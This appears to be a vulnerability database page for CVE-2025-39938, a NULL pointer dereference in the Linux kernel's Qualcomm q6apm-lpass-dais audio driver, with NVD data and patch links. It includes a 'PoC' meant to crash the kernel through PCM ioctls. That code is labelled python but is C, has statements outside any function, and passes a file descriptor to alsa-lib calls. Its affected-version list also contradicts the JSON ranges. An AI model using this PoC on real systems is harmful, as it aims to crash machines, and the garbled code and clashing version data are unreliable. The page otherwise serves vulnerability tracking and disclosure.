CVE-2025-39938

Description

In the Linux kernel, the following vulnerability has been resolved: ASoC: qcom: q6apm-lpass-dais: Fix NULL pointer dereference if source graph failed If earlier opening of source graph fails (e.g. ADSP rejects due to incorrect audioreach topology), the graph is closed and "dai_data->graph[dai->id]" is assigned NULL. Preparing the DAI for sink graph continues though and next call to q6apm_lpass_dai_prepare() receives dai_data->graph[dai->id]=NULL leading to NULL pointer exception: qcom-apm gprsvc:service:2:1: Error (1) Processing 0x01001002 cmd qcom-apm gprsvc:service:2:1: DSP returned error[1001002] 1 q6apm-lpass-dais 30000000.remoteproc:glink-edge:gpr:service@1:bedais: fail to start APM port 78 q6apm-lpass-dais 30000000.remoteproc:glink-edge:gpr:service@1:bedais: ASoC: error at snd_soc_pcm_dai_prepare on TX_CODEC_DMA_TX_3: -22 Unable to handle kernel NULL pointer dereference at virtual address 00000000000000a8 ... Call trace: q6apm_graph_media_format_pcm+0x48/0x120 (P) q6apm_lpass_dai_prepare+0x110/0x1b4 snd_soc_pcm_dai_prepare+0x74/0x108 __soc_pcm_prepare+0x44/0x160 dpcm_be_dai_prepare+0x124/0x1c0

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 6.6 (包含q6apm-lpass-dais驱动的版本)

Linux Kernel 6.6.x (部分版本)

Linux Kernel 6.10.x (部分版本)

Linux Kernel 6.11.x (部分版本)

Linux Kernel 6.12.x (部分版本)

Linux Kernel 6.15.x (部分版本)

Linux Kernel 6.16.x (部分版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-39938 PoC - Trigger NULL pointer dereference in q6apm-lpass-dais
// This PoC triggers the vulnerability by configuring an invalid audioreach topology
// that causes ADSP to reject the graph open, then attempts to prepare the DAI.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sound/asound.h>

// Step 1: Open PCM device for Qualcomm ASoC platform
int pcm_fd = open("/dev/snd/pcmC0D0p", O_WRONLY);
if (pcm_fd < 0) {
    perror("Failed to open PCM device");
    exit(1);
}

// Step 2: Configure invalid audio parameters to trigger ADSP rejection
// Set up PCM hardware parameters with invalid audioreach topology
struct snd_pcm_hw_params params;
memset(&params, 0, sizeof(params));

// Use unsupported format/rate that will cause ADSP to reject the graph
snd_pcm_hw_params_set_access(pcm_fd, params, SND_PCM_ACCESS_RW_INTERLEAVED);
snd_pcm_hw_params_set_format(pcm_fd, params, SND_PCM_FORMAT_S24_LE);
snd_pcm_hw_params_set_channels(pcm_fd, params, 8); // Invalid channel count
snd_pcm_hw_params_set_rate(pcm_fd, params, 192000, 0); // High rate

// Step 3: Apply parameters - this will trigger source graph open
int ret = ioctl(pcm_fd, SNDRV_PCM_IOCTL_HW_PARAMS, &params);
if (ret < 0) {
    printf("HW_PARAMS failed (expected): %s\n", strerror(errno));
}

// Step 4: Prepare the PCM - triggers q6apm_lpass_dai_prepare() with NULL graph
// This call will access dai_data->graph[dai->id] which is NULL
// causing kernel NULL pointer dereference at offset 0xa8
ret = ioctl(pcm_fd, SNDRV_PCM_IOCTL_PREPARE, 0);
if (ret < 0) {
    printf("PREPARE failed: %s\n", strerror(errno));
}

// At this point, the kernel should have crashed due to NULL pointer dereference
// Error messages expected:
//   qcom-apm gprsvc:service:2:1: Error (1) Processing 0x01001002 cmd
//   qcom-apm gprsvc:service:2:1: DSP returned error[1001002] 1
//   q6apm-lpass-dais: fail to start APM port 78
//   Unable to handle kernel NULL pointer dereference at virtual address 00000000000000a8
//   Call trace: q6apm_graph_media_format_pcm+0x48/0x120 (P)
//              q6apm_lpass_dai_prepare+0x110/0x1b4

close(pcm_fd);
return 0;

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-39938
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-39938
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-39938/
[4] VulDB https://vuldb.com/cve/CVE-2025-39938
[5] https://git.kernel.org/stable/c/01d1ba106c9e02a2e7d41e07be49031a0ff0ecaa
[6] https://git.kernel.org/stable/c/411f7d4f7038200cdf6d4f71ee31026ebf2dfedb
[7] https://git.kernel.org/stable/c/68f27f7c7708183e7873c585ded2f1b057ac5b97
[8] https://git.kernel.org/stable/c/9c534dbfd1726502abcf0bd393a04214f62c050b
[9] https://git.kernel.org/stable/c/cc336b242ea7e7a09b3ab9f885341455ca0a3bdb

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-39938", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T08:15:46.730", "lastModified": "2026-01-23T20:34:30.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: qcom: q6apm-lpass-dais: Fix NULL pointer dereference if source graph failed\n\nIf earlier opening of source graph fails (e.g. ADSP rejects due to\nincorrect audioreach topology), the graph is closed and\n\"dai_data->graph[dai->id]\" is assigned NULL. Preparing the DAI for sink\ngraph continues though and next call to q6apm_lpass_dai_prepare()\nreceives dai_data->graph[dai->id]=NULL leading to NULL pointer\nexception:\n\n qcom-apm gprsvc:service:2:1: Error (1) Processing 0x01001002 cmd\n qcom-apm gprsvc:service:2:1: DSP returned error[1001002] 1\n q6apm-lpass-dais 30000000.remoteproc:glink-edge:gpr:service@1:bedais: fail to start APM port 78\n q6apm-lpass-dais 30000000.remoteproc:glink-edge:gpr:service@1:bedais: ASoC: error at snd_soc_pcm_dai_prepare on TX_CODEC_DMA_TX_3: -22\n Unable to handle kernel NULL pointer dereference at virtual address 00000000000000a8\n ...\n Call trace:\n q6apm_graph_media_format_pcm+0x48/0x120 (P)\n q6apm_lpass_dai_prepare+0x110/0x1b4\n snd_soc_pcm_dai_prepare+0x74/0x108\n __soc_pcm_prepare+0x44/0x160\n dpcm_be_dai_prepare+0x124/0x1c0"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.154", "matchCriteriaId": "E49CD91E-FC55-45B0-BB63-9AD5F5D70CAA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.108", "matchCriteriaId": "A7E8EAEE-7731-4996-9578-696255D61EA2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.49", "matchCriteriaId": "CAA033E9-A2C5-4976-A83E-9804D8FB827F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.16.9", "matchCriteriaId": "638DD910-1189-4F5E-98BF-2D436B695112"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*", "matchCriteriaId": "327D22EF-390B-454C-BD31-2ED23C998A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:*", "matchCriteriaId": "C730CD9A-D969-4A8E-9522-162AAF7C0EE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:*", "matchCriteriaId": "39982C4B-716E-4B2F-8196-FA301F47807D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:*", "matchCriteriaId": "340BEEA9-D70D-4290-B502-FBB1032353B1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc5:*:*:*:*:*:*", "matchCriteriaId": "47E4C5C0-079F-4838-971B-8C503D48FCC2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc6:*:*:*:*:*:*", "matchCriteriaId": "5A4516A6-C12E-42A4-8C0E-68AEF3264504"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/01d1ba106c9e02a2e7d41e07be49031a0ff0ecaa", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/411f7d4f7038200cdf6d4f71ee31026ebf2dfedb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/68f27f7c7708183e7873c585ded2f1b057ac5b97", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9c534dbfd1726502abcf0bd393a04214f62c050b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cc336b242ea7e7a09b3ab9f885341455ca0a3bdb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}